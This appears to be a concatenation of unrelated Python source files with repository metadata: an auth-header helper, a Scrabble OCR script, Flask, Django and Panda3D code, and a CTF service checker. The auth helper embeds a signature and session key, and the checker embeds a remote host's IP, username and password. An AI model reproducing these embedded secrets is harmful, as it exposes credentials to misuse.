payload["SIGNATURE"] = "0sjqRg8nkKdxreZam16RgfZavEwEhY62uldUQQn/AjS33appwao6cbM2VlaJfIckl2LZHlVoTdANDHaZ4bLuPwhuStrROljeDeiZzyLVvhN69oM/9typX2qWrcH4x6UsoIX+kfp51YvxcYR4AiVyP8rTbINbBX//JMkv7XeTp+6tDfs+Efws0k+YqWqVouwnAnUf6+7HTn096ZsjN9uBWu5QcdDtpKOG2A99itfqtQ/O4HuGVwyUJIYB29yUU/Gmub/2mHnBSVu49KqYigLHGR3MpVTVMjNxdZELKLjDikdXVwDBe7UZEmS/y/5RriEy68T2bgTsRz6t84QLE6Heew=="
payload["SESSION_KEY"] = "mJpiCKZpCJG0dgS5EALL2HLKik+fOSW7MwtgytVQlmg="
print("payload===get_auth_head====",payload)
common_util = CommonUtil
auth_head = common_util.postrequestManager(url,headers,payload)
# auth_head = common_util.getRequestManager(url,headers,payload)
if(status==1):
auth_token = "Bearer " + auth_head["access_token"]
headers = {"Authorization":auth_token,"Content-Type": "applicaton/json"}
print("headers staus 1 =====",headers)
return headers
elif status==2:
auth_token = "Bearer " + auth_head["access_token"]
headers = {"Authorization":auth_token}
print("headers staus 2 =====",headers)
return headers
return {"Error":"invalid header status"}
| [
"84303172+chikkuthomas@users.noreply.github.com"
] | 84303172+chikkuthomas@users.noreply.github.com |
f1ef583aadd10cc24f2f4dbfad194f7a457bf95b | 977c5a562d3973965bfb0b4adf3cef35f9b9e135 | /Monitor.py | fa41f2206073984a580f635d296ef1287193d7e3 | [] | no_license | Adam0429/docker-try | 8939d103d1c6b6374847f57615fb67641d3d9add | 3ff80de8f57c482389babd1a3b1c4eedc07467db | refs/heads/master | 2021-04-18T22:09:56.813775 | 2018-06-11T02:51:21 | 2018-06-11T02:51:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | from kazoo.client import KazooClient
import time
import logging
logging.basicConfig()
zk = KazooClient(hosts='127.0.0.1:2181')
zk.start()
@zk.DataWatch('/path/to/watch')
def my_func(data, stat):
if data:
print("Data is %s" % data)
print
"Version is %s" % stat.version
else:
print("data is not available")
while True:
time.sleep(10)
zk.stop() | [
"872490934@qq.com"
] | 872490934@qq.com |
ff75406149e15011294ccb8e1cb60f0fc1fe9c12 | 7cd809a9410dc61238803aad6a73ed80bc15eeec | /Python/findboard.py | f7b5ffbb2def2674ff1e8db6b249e1130797cac0 | [
"MIT"
] | permissive | Oskrabble/ScrabbleOCR | ddbcb2d5b2f5641f6ee7a4ccb8e156f10b54dbb4 | 4470eca7dc476914ffaed71a6688c411fb958bdc | refs/heads/master | 2023-03-12T09:20:59.175752 | 2021-03-02T13:10:51 | 2021-03-02T13:10:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,997 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 26 15:20:14 2015
@author: elad
"""
from scipy.misc import imread
import numpy as np
import matplotlib.pyplot as plt
import cv2
from PIL import Image
import pytesseract
def four_point_transform(image, pts, dst=None):
# obtain a consistent order of the points and unpack them
# individually
rect = order_points(pts)
(tl, tr, br, bl) = rect
if dst == None:
# compute the width of the new image, which will be the
# maximum distance between bottom-right and bottom-left
# x-coordiates or the top-right and top-left x-coordinates
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
# compute the height of the new image, which will be the
# maximum distance between the top-right and bottom-right
# y-coordinates or the top-left and bottom-left y-coordinates
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxHeight = max(int(heightA), int(heightB))
else:
maxWidth, maxHeight = dst
# now that we have the dimensions of the new image, construct
# the set of destination points to obtain a "birds eye view",
# (i.e. top-down view) of the image, again specifying points
# in the top-left, top-right, bottom-right, and bottom-left
# order
dst = np.array([ [0, 0], [maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]], dtype = "float32")
# compute the perspective transform matrix and then apply it
M = cv2.getPerspectiveTransform(rect.astype("float32"), dst)
warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight))
# return the warped image
return warped
if __name__ == "__main__":
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_OnePlus (1).jpg"
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_letters (3).jpg"
img_fn = r"C:\Users\elad\Desktop\IMG_BOARD.jpg"
#img_fn = r"C:\Users\elad\Documents\code\DigitalScrabble\board_nexus3 (3).jpg"
im_size = 8e6 #in total pixels. The size to set the image (larger will shrink and smaller will enlarge)
blur_size = (5,5)
blur_std = 5
open_close_kernel_size = (10, 10)
curve_approx_eps = 15 # maximum distance between the original curve and its approximation
warped_shape = (1024, 1024) # to which shape wrap the board
grid_size = (8,8) # x,y
border_shift = 55 #pixels. from outer border to inner
tile_std_th = 10 # STD of each tile Hue, to decide if it is occupied or not
letter_bw_th = 150 # threshold to seperate tile's letter from background
#%%
bgr = cv2.imread(img_fn)
# Bring all images to the same size
factor = np.round(np.sqrt(im_size/(bgr.shape[0]*bgr.shape[1])),2)
if factor < 1: interpolation = cv2.INTER_AREA #shrink
else: interpolation = cv2.INTER_LINEAR #enlarge
bgr = cv2.resize(bgr,None, fx=factor, fy=factor)
rgb = cv2.cvtColor(bgr.copy(), cv2.COLOR_BGR2RGB)
rgb = cv2.GaussianBlur(rgb, blur_size, blur_std)
rgbPyrDown = cv2.pyrDown(rgb)
rgbPyrDown = cv2.pyrDown(rgbPyrDown) # Downsample image by 4
r,g,b = rgbPyrDown[:,:,0],rgbPyrDown[:,:,1],rgbPyrDown[:,:,2]
hsv = cv2.cvtColor(rgbPyrDown.copy(), cv2.COLOR_RGB2HSV)
h,s,v = hsv[:,:,0],hsv[:,:,1],hsv[:,:,2]
#%% Thresholding
lower_red = (0, 50, 50)
upper_red = (9, 230, 235)
bw = cv2.inRange(hsv, lower_red, upper_red)
lower_red = (170, 50, 50)
upper_red = (180, 230, 235)
bw2 = cv2.inRange(hsv, lower_red, upper_red)
bw = np.uint8(np.logical_or(bw,bw2))
kernel = np.ones(open_close_kernel_size ,np.uint8)
bw = cv2.morphologyEx(bw, cv2.MORPH_OPEN, kernel) # opening (remove small objects from the foreground)
bw = cv2.morphologyEx(bw, cv2.MORPH_CLOSE, kernel) # closing (fill small holes in the foreground)
#%% Find Contour and 4 Corners
bwCanny = cv2.Canny(bw, 1, 1)
#%%
image, contours, hierarchy = cv2.findContours(bw.copy(), cv2.RETR_EXTERNAL ,cv2.CHAIN_APPROX_SIMPLE)
rgb_contours = rgb.copy()
rgb_contours_approx = rgb.copy()
rgb_warped = None
if contours != []:
for contour in contours:
if np.abs(cv2.contourArea(contour)) < 15000:
continue
#minRect = cv2.minAreaRect(contour)
#rectPoints = cv2.boxPoints(minRect).astype(np.int32)
# TODO - check distance from center
contour = contour*4 # Upsample back to original image size
points = contour.reshape((-1,2))
topLeft_ind = np.argmin(points[:,0] + points[:,1])
bottomRight_ind = np.argmin(- points[:,0] - points[:,1])
topRight_ind = np.argmin(- points[:,0] + points[:,1])
bottomLeft_ind = np.argmin(points[:,0] - points[:,1])
corners = np.vstack((points[topLeft_ind,:],
points[topRight_ind,:],
points[bottomRight_ind,:],
points[bottomLeft_ind,:]))
rgb_contours_approx = rgb.copy()
cv2.drawContours(rgb_contours, contour, 0, (255,255,0), 5)
#cv2.drawContours(rgb_contours_approx, rectPoints.reshape((4,-1,2)), 0, (255,255,0), 5)
colors = ((255,0,0), (0,255,0), (0,0,255), (255,255,255))
for n in range(4):
cv2.circle(rgb_contours_approx, tuple(corners[n,:].tolist()), 35, colors[n],-1)
# Apply the perspective transformation
rgb_warped = four_point_transform(rgb.copy(), corners, warped_shape)
#%% find accurate corners of warped board
TEMPLATE_SIZE = 32
template = np.zeros((TEMPLATE_SIZE,TEMPLATE_SIZE,3), dtype=np.uint8)
template[0:TEMPLATE_SIZE/2-2, :, :] = (255, 0, 0) #red
template[:, 0:TEMPLATE_SIZE/2-2, :] = (255, 0, 0)
template[TEMPLATE_SIZE/2+2:, TEMPLATE_SIZE/2+2:, :] = (189, 215, 238) #light blue
roi_img_size_x = rgb_warped.shape[1] / 8
roi_img_size_y = rgb_warped.shape[0] / 8
corr_result = cv2.matchTemplate(rgb_warped[0:roi_img_size_y, 0:roi_img_size_x],
template, cv2.TM_CCOEFF_NORMED)
vmin, vmax, minLoc, maxLoc = cv2.minMaxLoc(corr_result)
topLeft = (maxLoc[0] + TEMPLATE_SIZE /2, maxLoc[1] + TEMPLATE_SIZE /2)
template = cv2.flip(template, -1)
roi_col = rgb_warped.shape[1] - roi_img_size_x
roi_row = rgb_warped.shape[0] - roi_img_size_y
corr_result = cv2.matchTemplate(rgb_warped[roi_col:, roi_row:], template, cv2.TM_CCOEFF_NORMED)
vmin, vmax, minLoc, maxLoc = cv2.minMaxLoc(corr_result)
bottomRight = (roi_col + maxLoc[0] + TEMPLATE_SIZE /2, roi_row + maxLoc[1] + TEMPLATE_SIZE /2)
# find two other corners by calculation
xc = (topLeft[0] + bottomRight[0])/2
yc = (topLeft[1] + bottomRight[1])/2 # Center point
xd = (topLeft[0] - bottomRight[0])/2
yd = (topLeft[1] - bottomRight[1])/2 # Half-diagonal
topRight = (xc - yd, yc + xd)
bottomLeft = (xc + yd, yc - xd)
corners = np.array([topLeft, topRight, bottomRight, bottomLeft])
#%% Build Tiles grid
rgb_warped_plot = rgb_warped.copy()
vr_x = (corners[1,0] - corners[0,0]) / grid_size[0]; # one unit of vector right
vr_y = (corners[1,1] - corners[0,1]) / grid_size[1]; # one unit of vector right
vd_x = (corners[3,0] - corners[0,0]) / grid_size[0]; # one unit of vector down
vd_y = (corners[3,1] - corners[0,1]) / grid_size[1]; # one unit of vector down
tiles = []
for row in range(grid_size[1]):
for col in range(grid_size[0]):
p1 = np.array([corners[0,0] + col*vr_x + row*vd_x,
corners[0,1] + col*vr_y + row*vd_y])
p2 = np.array([corners[0,0] + (col+1)*vr_x + (row+1)*vd_x,
corners[0,1] + (col+1)*vr_y + (row+1)*vd_y])
tiles.append({'row':row, 'col': col, 'p1':p1, 'p2': p2 })
for tile in tiles:
cv2.rectangle(rgb_warped_plot, tuple(tile['p1'].tolist()),tuple(tile['p2'].tolist()), (0,255,255), 5)
#%% Check if grid occupied
hsv2 = cv2.cvtColor(rgb_warped.copy(), cv2.COLOR_RGB2HSV)
h2,s2,v2 = hsv2[:,:,0],hsv2[:,:,1],hsv2[:,:,2]
occupied_tiles = []
for i in range(grid_size[1]):
for j in range(grid_size[0]):
x,y = grid[i,j,:]
tile_roi = h2[y-tile_height/2+20:y+tile_height/2-20,
x-tile_width/2+20:x+tile_width/2-20]
tile_std = np.std(tile_roi)
#print("i=%d, j=%d, std=%.2f" % (i,j,tile_std))
if tile_std > tile_std_th:
occupied_tiles.append((i,j))
cv2.circle(rgb_warped_plot, tuple(grid[i,j,:].tolist()), 30, (255,255,0),-1)
#%% Build Lettes Dict
rgb_letters_plots = rgb_warped.copy()
letters = []
for tile_ij in occupied_tiles:
letter = {}
i,j = tile_ij
x,y = grid[i,j,:]
tile_roi = v2[y-tile_height/2+25:y+tile_height/2-25,
x-tile_width/2+25:x+tile_width/2-25]
tile_bw = tile_roi > letter_bw_th
pil_img = Image.fromarray(np.uint8(tile_bw))
tile_ocr = pytesseract.image_to_string(pil_img, config="-psm 10")
letter['i'], letter['j'] = i,j
letter['bw'] = tile_bw
letter['ocr'] = tile_ocr
letters.append(letter)
print("i=%d, j=%d, OCR=%s" % (i,j, tile_ocr))
cv2.putText(rgb_letters_plots, "%s" % tile_ocr, tuple((grid[i,j,:]-4).tolist()),
cv2.FONT_HERSHEY_SIMPLEX, 2.5, (255,255,255), 3 ,2)
cv2.putText(rgb_letters_plots, "%s" % tile_ocr, tuple(grid[i,j,:].tolist()),
cv2.FONT_HERSHEY_SIMPLEX, 2.5, (0,0,0), 3 ,2)
#
#minLineLength = 100
#maxLineGap = 1
#lines = cv2.HoughLinesP(bw.copy(), 1, np.pi/180, 100, minLineLength, maxLineGap)
#rgb_hough_lines = rgb.copy()
#for x1,y1,x2,y2 in lines[:,0,:]:
# cv2.line(rgb_hough_lines,(x1,y1),(x2,y2),(0,255,0),2)
#%% Plot
# Plot RGB and HSV
fig = plt.figure()
ax1 = fig.add_subplot(2,3,1)
ax1.imshow(r, cmap='gray')
ax1.set_title("Red")
ax1.format_coord = lambda x,y: "x=%.1f, y=%.1f, Red=%1.f" % (x, y, r[int(y),int(x)])
ax2 = fig.add_subplot(2,3,2)
ax2.imshow(g, cmap='gray')
ax2.set_title("Green")
ax2.format_coord = lambda x,y: "x=%.1f, y=%.1f, Green=%1.f" % (x, y, g[int(y),int(x)])
ax3 = fig.add_subplot(2,3,3)
ax3.imshow(b, cmap='gray')
ax3.set_title("Blue")
ax3.format_coord = lambda x,y: "x=%.1f, y=%.1f, Blue=%1.f" % (x, y, b[int(y),int(x)])
ax4 = fig.add_subplot(2,3,4)
ax4.imshow(h, cmap='gray')
ax4.set_title("Hue")
ax4.format_coord = lambda x,y: "x=%.1f, y=%.1f, Hue=%1.f" % (x, y, h[int(y),int(x)])
ax5 = fig.add_subplot(2,3,5)
ax5.imshow(s, cmap='gray')
ax5.set_title("Saturation")
ax5.format_coord = lambda x,y: "x=%.1f, y=%.1f, Saturation=%1.f" % (x, y, s[int(y),int(x)])
ax6 = fig.add_subplot(2,3,6)
ax6.imshow(v, cmap='gray')
ax6.set_title("Value")
ax6.format_coord = lambda x,y: "x=%.1f, y=%.1f, Value=%1.f" % (x, y, v[int(y),int(x)])
# Plot Threshold
fig2 = plt.figure()
ax1_2 = fig2.add_subplot(2,2,1)
ax1_2.imshow(rgb)
ax1_2.set_title("RGB")
ax2_2 = fig2.add_subplot(2,2,2)
ax2_2.imshow(bw, cmap='gray')
ax2_2.set_title("BW")
ax3_2 = fig2.add_subplot(2,2,3)
ax3_2.imshow(rgb_contours_approx)
ax3_2.set_title("4 Corners detction")
ax4_2 = fig2.add_subplot(2,2,4)
ax4_2.imshow(rgb_warped)
ax4_2.set_title("RGB Warped")
# Plot Grid
fig3 = plt.figure()
ax1_3 = fig3.add_subplot(2,2,1)
ax1_3.imshow(rgb_warped_plot)
ax1_3.set_title("Grid Detection")
ax2_3 = fig3.add_subplot(2,2,2)
ax2_3.imshow(rgb_letters_plots)
ax2_3.set_title("Letters OCR")
"""
HSV color space is also consists of 3 matrices, HUE, SATURATION and VALUE.
In OpenCV, value range for HUE, SATURATION and VALUE are
respectively 0-179, 0-255 and 0-255.
HUE represents the color, SATURATION represents the amount to which that
respective color is mixed with white and VALUE represents the amount to
which that respective color is mixed with black.
red object has HUE, SATURATION and VALUE in between 170-180, 160-255, 60-255
Hue values of basic colors
Orange 0-22
Yellow 22- 38
Green 38-75
Blue 75-130
Violet 130-160
Red 160-179
""" | [
"eladjoseph@hotmail.com"
] | eladjoseph@hotmail.com |
45242f33898eb7f9f32d81e88104ff79dccc109a | f9fe13fe62ba3fb1fb096da4268d5dc43e435ea4 | /44)in_range_or_not.py | 7b43b95dede8dbe7f422e93fd0c9f353fc060d58 | [] | no_license | MANNEMPRATAPVARUN/guvipy | 7e460da8b9d98c2fcd488757585d5bd207570666 | 4da4fe4f3d4855e14383015da19588ef0aea4f32 | refs/heads/master | 2020-06-10T01:22:26.063815 | 2019-06-12T13:44:44 | 2019-06-12T13:44:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 81 | py | num2=int(input())
if num2 in range(1,10):
print("yes")
else:
print("no")
| [
"noreply@github.com"
] | noreply@github.com |
508db52a1ce4ee8d59763669cf083035e3b0ebe6 | ee6e6b1d4d00aa4d45ea430488d984e976585f61 | /app.py | 86d738dcfe62ddeea6b58c738b545eaf3bbfc9a7 | [] | no_license | MINHAS3/Mission-to-Mars | b726766f4d851d1faa20f20b2a7b052eab09476d | 3b2001006d1cd923cafebfeeae3ff1a4ed32f72c | refs/heads/master | 2023-01-11T00:45:13.281690 | 2020-11-05T18:54:31 | 2020-11-05T18:54:31 | 286,098,935 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from flask import Flask, render_template
from flask_pymongo import PyMongo
import scraping
app = Flask(__name__)
# Use flask_pymongo to set up mongo connection
app.config["MONGO_URI"] = "mongodb://localhost:27017/mars_app"
mongo = PyMongo(app)
@app.route("/")
def index():
mars = mongo.db.mars.find_one()
return render_template("index.html", mars=mars)
@app.route("/scrape")
def scrape():
mars = mongo.db.mars
mars_data = scraping.scrape_all()
mars.update({}, mars_data, upsert=True)
return "Scraping Successful!"
if __name__ == "__main__":
app.run()
| [
"noreply@github.com"
] | noreply@github.com |
05a556ef861672edfb343d7c6bee8f42af414fb8 | 0959d88eb8e1ab579dec7eb4bfc1fbaac945ea0b | /Training/HackRank/Day/d1.py | 594bf8c900683d4262274389d4fb02313fc23838 | [] | no_license | mike03052000/python | ba1b871acf853710fd840284f260d82ea8e597cf | 19045d56ae1caa305f51f1cad6c71d97b82ca47d | refs/heads/master | 2020-04-04T12:21:55.284225 | 2019-06-20T05:35:25 | 2019-06-20T05:35:25 | 155,923,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 947 | py | i=4
d=4.0
s = 'Hacker Rank'
# Declare second integer, double, and String variables.
i2=0
d2=0.0
s2=''
# Read and save an integer, double, and String to your variables.
i2=int(input().strip())
d2=float(input().strip())
s2=input().strip()
# Print the sum of both integer variables on a new line.
print(i+i2)
# Print the sum of the double variables on a new line.
print(d+d2)
# Concatenate and print the String variables on a new line
# The 's' variable above should be printed first.
print(s+s2)
# Declare second integer, double, and String variables.
a = 0
b = 0.0
c = ""
# Read and save an integer, double, and String to your variables.
a = int(input())
b = float(input())
c = str(input())
# Print the sum of both integer variables on a new line.
print(i+a)
# Print the sum of the double variables on a new line.
print(d+b)
# Concatenate and print the String variables on a new line
# The 's' variable above should be printed first.
print(s,c)
| [
"saka16888@gmail.com"
] | saka16888@gmail.com |
5d6e694a8990fb46429ed901d0093ca8ac480f52 | e63dbac6d1dbe1cb8a68ac911c562d9fa9192a59 | /odvm/renderer.py | 37f8f76a5fe9b80244424dbac68738b8b16aec6d | [
"MIT"
] | permissive | hi9hlander/odvm | e5ae9fab9c3f45b2f9eb6a253db4c66fd0efa19b | 90df59ac584690a70658477ccf109c143c250d9d | refs/heads/master | 2022-01-21T02:37:58.704535 | 2017-09-25T18:59:19 | 2017-09-25T18:59:19 | 99,145,092 | 3 | 3 | MIT | 2022-01-17T00:24:26 | 2017-08-02T17:44:19 | Python | UTF-8 | Python | false | false | 6,491 | py | from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from math import tan, radians
def glsl_check_for_use(glsl,feature): return ''.join(feature.split()) in ''.join(glsl.split())
class viewport:
def __init__(self,idx=0):
self.index = idx
win_props = WindowProperties()
props = FrameBufferProperties()
props.srgb_color = True
props.stencil_bits = 1
props.alpha_bits = 0
props.aux_hrgba = 1
self.output = base.graphics_engine.make_output(
base.pipe, 'viewport{}-output'.format(self.index), -2,
props, win_props,
GraphicsPipe.BF_size_track_host | GraphicsPipe.BF_resizeable | GraphicsPipe.BF_refuse_window,
base.win.gsg, base.win )
Texture.set_textures_power_2(ATS_none) # otherwise fullscreen triangle won't work
self.depth_stencil = Texture()
self.output.get_fb_properties().setup_depth_texture(self.depth_stencil)
self.depth_stencil.wrap_u = self.depth_stencil.wrap_v = self.depth_stencil.wrap_w = SamplerState.WM_clamp
self.depth_stencil.magfilter = self.depth_stencil.minfilter = SamplerState.FT_nearest
self.output.add_render_texture( self.depth_stencil, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_depth_stencil )
self.color = Texture()
self.output.get_fb_properties().setup_color_texture(self.color)
self.color.wrap_u = self.color.wrap_v = self.color.wrap_w = SamplerState.WM_clamp
self.color.magfilter = self.color.minfilter = SamplerState.FT_nearest
self.output.add_render_texture( self.color, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_color )
self.output.sort = self.index
self.output.disable_clears()
self.output.display_regions[0].disable_clears()
self.output.set_clear_depth_active(True)
self.output.clear_color = Vec4(0.0,0.5,0.0,0.0)
self.output.set_clear_color_active(True)
self.output.clear_delete_flag()
base.make_camera( self.output, useCamera=base.cam )
base.cam.node().display_regions[-1].disable_clears()
#self.stencil = StencilAttrib.make( True, StencilAttrib.SCF_always, StencilAttrib.SO_zero, StencilAttrib.SO_replace, StencilAttrib.SO_replace, 1, 0, 1 )
self.viewport_inputs = []
def add_shader(self,vertex,fragment):
if glsl_check_for_use( fragment, 'gl_FragData[1] =' ):
self.aux0 = Texture()
self.aux0.wrap_u = self.aux0.wrap_v = self.aux0.wrap_w = SamplerState.WM_clamp
self.aux0.magfilter = self.aux0.minfilter = SamplerState.FT_nearest
self.output.add_render_texture( self.aux0, GraphicsOutput.RTM_bind_or_copy, GraphicsOutput.RTP_aux_hrgba_0 )
self.output.set_clear_value(GraphicsOutput.RTP_aux_hrgba_0,Vec4(0.0,0.0,1024.0,0.0))
self.output.set_clear_active(GraphicsOutput.RTP_aux_hrgba_0,True)
self.shader = ShaderAttrib.make().set_shader(Shader.make( Shader.SLGLSL, vertex, fragment ))
if glsl_check_for_use( fragment, 'uniform vec4 viewport;' ): self.add_viewport_input(self)
else : base.cam.node().set_initial_state(RenderState.make_empty().add_attrib(self.shader))#.add_attrib(self.stencil))
def calc_viewport_input(self,win):
sclx = tan( radians( 0.5 * base.cam.node().get_lens().get_hfov() ) )
scly = tan( radians( 0.5 * base.cam.node().get_lens().get_vfov() ) )
self.viewport = Vec4( -2.0*sclx/(win.get_x_size()-1), -2.0*scly/(win.get_y_size()-1), sclx*(1.0+1.0/(win.get_x_size()-1)), scly*(1.0+1.0/(win.get_y_size()-1)) )
def add_viewport_input(self,obj):
if not self.viewport_inputs:
base.accept( 'window-event', self.hook_window_event )
self.calc_viewport_input(base.win)
self.viewport_inputs.append(obj)
obj.set_viewport_input(self.viewport)
def hook_window_event(self,win):
base.windowEvent(win)
self.calc_viewport_input(win)
for o in self.viewport_inputs: o.set_viewport_input(self.viewport)
def set_viewport_input(self,viewport):
self.shader = self.shader.set_shader_input( 'viewport', viewport )
base.cam.node().set_initial_state(RenderState.make_empty().add_attrib(self.shader))#.add_attrib(self.stencil))
class composer:
def __init__(self):
geom = Geom(GeomVertexData( 'empty-vertices', GeomVertexFormat.get_empty(), GeomEnums.UH_static ))
tri = GeomTriangles(GeomEnums.UH_static)
tri.add_next_vertices(3)
geom.add_primitive(tri)
node = GeomNode('composer-full-screen-triangle')
node.add_geom(geom) #, RenderState.make_empty().add_attrib(StencilAttrib.make( True, StencilAttrib.SCF_equal, StencilAttrib.SO_keep, StencilAttrib.SO_keep, StencilAttrib.SO_keep, 1, 1, 0 )) )
node.set_bounds(OmniBoundingVolume())
node.final = True
self.output = render2d.attach_new_node(node)
def attach_viewport(self,viewport):
self.viewport = viewport
self.output.set_texture(self.viewport.color)
def add_shader(self,vertex,fragment):
self.output.set_shader(Shader.make( Shader.SLGLSL, vertex, fragment ))
if glsl_check_for_use( fragment, 'uniform sampler2D aux0;' ) and hasattr( self.viewport, 'aux0' ): self.output.set_shader_input( 'aux0', self.viewport.aux0 )
if glsl_check_for_use( fragment, 'uniform vec4 viewport;' ): self.viewport.add_viewport_input(self)
def set_viewport_input(self,viewport): self.output.set_shader_input( 'viewport', viewport )
class Renderer(ShowBase):
def __init__(self):
load_prc_file_data('','coordinate-system yup_right' )
load_prc_file_data('','gl-coordinate-system default')
ShowBase.__init__(self)
render.set_texture( loader.load_texture('white.png'), 0 )
base.win.sort = 2
base.win.disable_clears()
base.win.display_regions[0].disable_clears()
base.win.display_regions[0].active = False
base.cam.node().display_regions[0].disable_clears()
base.cam.node().display_regions[0].active = False
base.cam2d.node().display_regions[0].disable_clears()
render2d.set_two_sided(False)
render2d.set_depth_write(False)
render2d.set_depth_test(False)
self.viewport = viewport()
self.composer = composer()
self.composer.attach_viewport(self.viewport)
| [
"noreply@github.com"
] | noreply@github.com |
e1202a8d6e06e1351e97305d751f7097572ef0b8 | 4a3b8c00d9d52bfb4743a525c230a7bae4766692 | /config/urls.py | c5c49726327c30a2c3dfb0b526c14f2146ee1ee8 | [
"MIT"
] | permissive | wapyce/wapyce | 36934f9ae234719cc0193e70f3638f77d0efd9e2 | abd8c85f40387aefa2a2e37ca44296ef086016a6 | refs/heads/master | 2020-03-31T03:26:47.928090 | 2018-10-29T16:26:18 | 2018-10-29T16:26:18 | 151,865,356 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,064 | py | """
Wapyce URL Configuration.
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include
from django.urls import path
# pylint: disable=invalid-name
urlpatterns = [
path('admin/', admin.site.urls),
path('api/v1/validation/', include('wapyce.validation.api.urls')),
path('api/v1/accessibility/', include('wapyce.accessibility.api.urls')),
path('validation/', include('wapyce.validation.urls')),
path('', include('wapyce.core.urls')),
]
| [
"carlsonsantana@gmail.com"
] | carlsonsantana@gmail.com |
093d9bd346d066a2828b59e9e5e6f7131c0e5c4c | 0cac9ab396358ce89271b651bbde6d7cbd219c21 | /discovery/discovery/wsgi.py | 69ac16c1bff20abbe4b39927189333d9441f3d91 | [] | no_license | tanmaygatle/IOT-Air-Quality-Monitoring-System | 956fce07afdf359b470aa82bf825b6f30ad8611a | d73254bd251e5c9550fb176017deeead4d749bea | refs/heads/master | 2022-10-19T17:23:59.001038 | 2020-06-11T15:24:20 | 2020-06-11T15:24:20 | 266,624,046 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | """
WSGI config for discovery project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'discovery.settings')
application = get_wsgi_application()
| [
"tanmaygatle@gmail.com"
] | tanmaygatle@gmail.com |
46d07f77a3ed269d5cdade5ddc93f5aa2ed1312c | fe354018a25861cae72d992bcd75c5e60a21372a | /re10/diary/models.py | 5a26e16e393e2700064de6a50f205dbdc7850115 | [] | no_license | mhoshino38/pola | b218dba0621b364ca8e5a5600887f592bfb02af9 | 0bb220e3cf66a2f21cfe845780c5d5f985808d23 | refs/heads/master | 2020-06-30T13:43:53.221844 | 2019-08-06T12:18:47 | 2019-08-06T12:18:47 | 200,844,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.db import models
from django.utils import timezone
class Day(models.Model):
title = models.CharField('Title', max_length=15)
text = models.TextField('Text', max_length=200)
date = models.DateTimeField('Date', default=timezone.now)
def __str__(self):
return self.title
| [
"noreply@github.com"
] | noreply@github.com |
b5c7e8a6d3939116d4a259600d6f18348004859d | bf53931505601b3e11edc80fd436a51f8ecdbbe2 | /checkers/Binder/checker_remote/checker/message_packers/simple_1/gen.py | b2a25907e3e087d7dc4b95e5bc3091616691ce59 | [
"MIT"
] | permissive | HITB-CyberWeek/proctf-2019 | 576ca55d4f8974767efb31e070af7147c29ee72d | 2d9acd1b255e8057db87928e51e0f94584fe55be | refs/heads/master | 2020-09-01T15:37:21.446225 | 2019-10-18T10:05:03 | 2019-10-18T10:05:03 | 218,994,529 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py |
import os,string,random
import subprocess as sp
from . import remote_runner
class Generator:
def __init__(self):
self.runner = remote_runner.RemoteVerifier("10.60.31.102",3011,"test","sfdkjfds45a")
def Generate(self,password,message,out_path,debug=False):
kk = 0
for p in password:
kk = kk ^ ord(p)
enc_mes = ""
for c in message:
enc_mes += chr(kk ^ ord(c))
ar = []
for c in enc_mes:
ar.append(hex(ord(c)))
ar.append(hex(0))
mes = "{%s}" %(",".join(ar))
meslen = len(message)
mod_dir = os.path.dirname(__file__)
cur_dir = os.getcwd()
if mod_dir != "":
os.chdir(mod_dir)
proc = sp.Popen(['./compile.sh',str(meslen),mes,out_path,str(kk)],\
stdout=sp.PIPE,stderr=sp.PIPE)
out,err = proc.communicate()
if debug:
print("[DEBUG] Generate",password,message,out_path,out,err)
os.chdir(cur_dir)
if len(err.decode()) != 0:
return False
return True
def verify2(self,password,message,file,debug=False):
for i in range(3):
c=random.choice(string.ascii_uppercase)
password = password +c+c
proc = sp.Popen(['timeout',"-s","KILL","7","./seccomp_test/wrapper",file,password],stdout=sp.PIPE)
out = proc.communicate()
if not message in out[0].decode():
return False
return True
def verify(self,password,message,file,debug=False):
for i in range(2):
c=random.choice(string.ascii_uppercase)
password = password +c+c
output = self.runner.RunUserBinary(file,password)
if not message in output.decode():
return False
return True
if __name__ == "__main__":
g=Generator()
g.Generate("qweqwe",'asdasd',"mes2",True)
| [
"awengar@gmail.com"
] | awengar@gmail.com |
7b375c81b77e9b35c1623c3699790ed98d0b9a61 | 5c90b31943aff36cab344574b16575025e649b7e | /examples/tour_examples/xkcd_tour.py | 73632b0471a64d556c17914eda6f7e0bd123423f | [
"MIT"
